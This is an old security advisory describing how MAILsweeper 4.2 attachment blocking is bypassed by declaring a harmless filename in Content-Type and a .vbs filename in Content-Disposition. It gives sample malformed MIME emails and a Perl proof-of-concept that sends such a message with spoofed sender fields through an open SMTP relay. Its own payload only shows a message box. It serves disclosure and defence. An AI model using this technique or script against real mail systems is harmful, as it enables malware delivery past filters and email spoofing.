COMMAND
MAILsweeper
SYSTEMS AFFECTED
MAILsweeper 4.2.* (not tested other e-mail content filtering systems)
PROBLEM
Aidan O'Kelly found following. Companies or organisations relying
upon MAILsweeper or other email content filtering systems, to
protect themselves against viruses or malicious attachments by
blocking e-mails via attachment filename.
A large number of organisations including many IT Security
companies utilise MAILsweeper by Content Technologies (now
Baltimore) to protect and prevent mailicious viruses and / or
attachments from entering their networks. However a situation has
been brought to our attention where a malicious user can bypass
content filtering systems in place.
When an administrator sets up fileblocking using a filter (File
Blocker), this restriction can be bypassed by malforming an e-mail
attachment header to trick the system into letting the e-mail
through to the user. This can lead to viruses and files that the
administrator would like to restrict, entering the network and
possibly leading to denial of service and data destruction
scenarios.
When a user sends an e-mail to another user with an attachment,
the e-mail will include the mail headers, the body of the e-mail,
the attachment headers and the attachment (typically MIME
encoded):
Return-Path: user_a@test.com
From: User A <user_a@test.com>
To: User B <user_b@test.com>
Subject: Fw: FYI
Date: Thurs, 22 Feb 2001 13:38:19 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.23)
Content-Type: multipart/mixed ;
boundary="----_=_NextPart_000_02D35B68.BA121FA3"
Status: RO
This message is in MIME format. Since your mail reader does not
understand
this format, some or all of this message may not be legible.
------_=_NextPart_000_02D35B68.BA121FA3
Content-Type: text/plain; charset="iso-8859-1"
Hi,
Just popping a note to say hi!
Cheers,
User B.
------_=_NextPart_000_02D35B68.BA121FA3
Content-Type: text/plain;
name="virus.v*b*s"
Content-Disposition: attachment;
filename="virus.vbs"
' Test Virus
' Blah blah blah
' Do something devastating here!
------_=_NextPart_000_02D35B68.BA121FA3
You will see from the attachment headers at the end of the e-mail
that the filename of the attachment is defined twice. The issue
that allows a malicious e-mail to bypass Mailsweeper's File
Blocking, is the blocking agent only checks the first filename
(set in the Content-Type line) against the filter set up by an
administrator and therefore ignores the second filename (set in
the Content-Disposition line).
The Outlook e-mail client uses the second filename to define the
name of the attachment to open / run. Therefore it is possible
to malform an e-mail by changing the first filename definition to
a valid type that will not be stopped by Mailsweeper. If a File
Blocking filter is in place to block all attachments with
filenames of *.vb*, the above e-mail will be correctly and
successfully blocked. However, if the second e-mail is passed
through the Mailsweeper system, it will not be blocked and
successfully delivered to the user (assuming .doc files are also
not being blocked).
Return-Path: user_a@test.com
From: User A <user_a@test.com>
To: User B <user_b@test.com>
Subject: Fw: FYI
Date: Thurs, 22 Feb 2001 13:38:19 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.23)
Content-Type: multipart/mixed ;
boundary="----_=_NextPart_000_02D35B68.BA121FA3"
Status: RO
This message is in MIME format. Since your mail reader does not
understand
this format, some or all of this message may not be legible.
------_=_NextPart_000_02D35B68.BA121FA3
Content-Type: text/plain; charset="iso-8859-1"
Hi,
A note to say hi!
Cheers,
User B.
------_=_NextPart_000_02D35B68.BA121FA3
Content-Type: text/plain;
name="test.doc"
Content-Disposition: attachment;
filename="virus.vbs"
' Test Virus
' Blah blah blah
' Do something devastating here!
------_=_NextPart_000_02D35B68.BA121FA3
msweep-fb.pl:
#!/usr/bin/perl
#
# Usage: ./msweep-fb.pl <fromname> <fromaddr> <toname> <toaddr> <openrelay> - Single instance using <openrelay>
# ./msweep-fb.pl <fromname> <fromaddr> <toname> <toaddr> -r - Single instance using a random relay
# ./msweep-fb.pl -f <listofaddrs> <openrelay> - Send to / from a list of addresses (file) using <openrelay>
# ./msweep-fb.pl -f <listofaddrs> -r - Send to / from a list of addresses (file) using random relays
# ./msweep-fb.pl [--help|-h] - Prints out this usage list
#
# Open relays courtesy of cyberarmy.com - NOT IMPLEMENTED YET (will I ever get time?)
#
# N.B. This is kwik and n45tY! (o)(o)
#
#
# Libraries:
#
use IO::Socket;
#
# Constants:
#
$hstProto = "tcp";
$hstPort = "25";
$mailHELO = "HELO world";
$mailFROM = "MAIL FROM: ";
$mailRCPT = "RCPT TO: ";
$mailDATA = "DATA\r";
$mailTERM = "\r\n\r\n.\r";
$mailQUIT = "QUIT\r";
#
#
#
if ( $ARGV[0] eq "-f" )
{
print "WARNING! Not implemented yet\n";
# open ( INPUT,"$ARGV[1]",O_RDONLY ) or die "ERROR! Cannot open source file $ARGV[1]";
# @INPUT = <INPUT>;
#
# foreach $line ( @INPUT )
# {
# chomp ( $line );
# if ( length ( $line ) > 1 )
# {
# }
# }
# close ( INPUT );
#
}
elsif ( $ARGV[4] eq "-r" )
{
print "WARNING! Not implemented yet\n";
}
elsif ( ( ( $ARGV[0] ne "--help" ) || ( $ARGV[0] ne "-h" ) ) && ( $ARGV[1] ne "" ) && ( $ARGV[2] ne "" ) && ( $ARGV[3] ne "" ) && ( $ARGV[4] ne "") )
{
$hstRelay = $ARGV[4];
$sktMSweep = IO::Socket::INET-> new (PeerAddr => $hstRelay, PeerPort => $hstPort, Proto => $hstProto, Type => $hstStreamType)
or die "ERROR! Couldn't connect to $hstRelay : $hstPort - $@\n";
$sktReply = <$sktMSweep>;
print "MSweep DEBUG: $sktReply\n\n";
$sktField = $mailHELO;
print "MSweep DEBUG: $sktField\n";
print $sktMSweep "$sktField\n";
$sktReply = <$sktMSweep>;
print "MSweep DEBUG: $sktReply\n\n";
$sktField = "$mailFROM$ARGV[1]";
print "MSweep DEBUG: $sktField\n";
print $sktMSweep "$sktField\n";
$sktReply = <$sktMSweep>;
print "MSweep DEBUG: $sktReply\n\n";
$sktField = "$mailRCPT$ARGV[3]";
print "MSweep DEBUG: $sktField\n";
print $sktMSweep "$sktField\n";
$sktReply = <$sktMSweep>;
print "MSweep DEBUG: $sktReply\n\n";
$sktField = $mailDATA;
print "MSweep DEBUG: $sktField\n";
print $sktMSweep "$sktField\n";
print "MSweep DEBUG: Sending e-mail...\n";
print $sktMSweep <<end_of_mail;
Return-Path: <$ARGV[1]>\r
From: $ARGV[0] <$ARGV[1]>\r
To: $ARGV[2] <$ARGV[3]>\r
Subject: Fw: FYI\r
Date: Mon, 19 Feb 2001 10:36:12 -0800\r
MIME-Version: 1.0\r
X-Mailer: Internet Mail Service (10.10.123)\r
Content-Type: multipart/mixed ; =
boundary="----_=_NextPart_000_01C09A86.DA181CF6"\r
Status: RO\r
\r
This message is in MIME format. Since your mail reader does not understand\r
this format, some or all of this message may not be legible.\r
\r
------_=_NextPart_000_01C09A86.DA181CF6\r
Content-Type: text/plain; charset="iso-8859-1"\r
\r
---------- Forwarded message ----------\r
\r
Date: Thu, 15 Feb 2001 16:21:42 -0800\r
From: Network Security Team \@ MIS <fake-mail-addr\@mis-cds.com>\r
To: Unsuspecting user <unsuspecting.user\@test.com>\r
Cc: Unsuspect user 2 <unsuspecting.user2\@test.org>\r
Subject: Fw: Proof of concept for bypassing MailSweeper\r
\r
Hi,\r
\r
By double clicking on the attachment, a text box should appear. This is a proof of concept exploit for a vulnerability in MailSweeper's file content checking mechanisms.\r
\r
NST,\r
MIS Corporate Defence Solutions Ltd.\r
\r
\r
\r
\r
------_=_NextPart_000_01C09A86.DA181CF6\r
Content-Type: text/plain;\r
name="test.doc"\r
Content-Disposition: attachment;\r
filename="test.txt.v*b*s"\r
\r
msgbox("MIS Corporate Defence Solutions has compromised your organisations e-mail content filtering systems. This is part of the ongoing Network Penetration Test by MIS. Please contact your Network Administrator or the MIS Network Security Team on nst\@mis-cds.com for further details")\r
\r
end_of_mail
print $sktMSweep "\r\n\r\n------_=_NextPart_000_01C09A86.DA181CF6\r\n";
print $sktMSweep "$mailTERM\n";
$sktReply = <$sktMSweep>;
print "MSweep DEBUG: $sktReply\n\n";
$sktField = $mailQUIT;
print "MSweep DEBUG: $sktField\n";
print $sktMSweep "$sktField\n";
$sktReply <$sktMSweep>;
print "MSweep DEBUG: $sktReply\n\n";
#Generate e-mail there
close ($sktMSweep);
}
else
{
print "Usage:\t./msweep-fb.pl <fromaddr> <toaddr> <openrelay>\t- Single instance using <openrelay>\n";
print "\t./msweep-fb.pl <fromaddr> <toaddr> -r\t\t- Single instance using a random relay\n";
print "\t./msweep-fb.pl -f <listofaddrs> <openrelay>\t- Send to / from a list of addresses (file) using <openrelay>\n";
print "\t./msweep-fb.pl -f <listofaddrs> -r\t\t\t- Send to / from a list of addresses (file) using random relays\n";
print "\t./msweep-fb.pl [--help|-h]\t\t\t\t- Prints out this usage list\n";
}
exit();
SOLUTION
Baltimore has released a workaround and utility to help prevent
this issue from being exploited. Please use the "Data Type
Manager" where applicable and install the script.exe utility to
check for malicious threats (available from:
http://www.contenttechnologies.com/download/extras/free_utilities.asp#Script%20Tool).